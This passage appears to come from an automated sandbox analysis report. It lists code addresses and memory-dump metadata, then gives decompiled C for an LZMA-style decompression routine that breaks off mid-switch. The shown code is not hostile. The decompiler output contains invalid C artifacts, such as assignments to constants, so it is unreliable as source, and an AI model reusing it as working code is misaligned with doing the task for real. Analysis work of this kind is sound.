                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00000000
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x00406803
                                                  0x00406a38
                                                  0x00406a5a
                                                  0x00406a60
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00000000
                                                  0x00406067
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000
                                                  0x00406a6f
                                                  0x004068bc
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00406999
                                                  0x00000000
                                                  0x0040680e

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                  • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                                  • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                  • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406520, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00406520() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
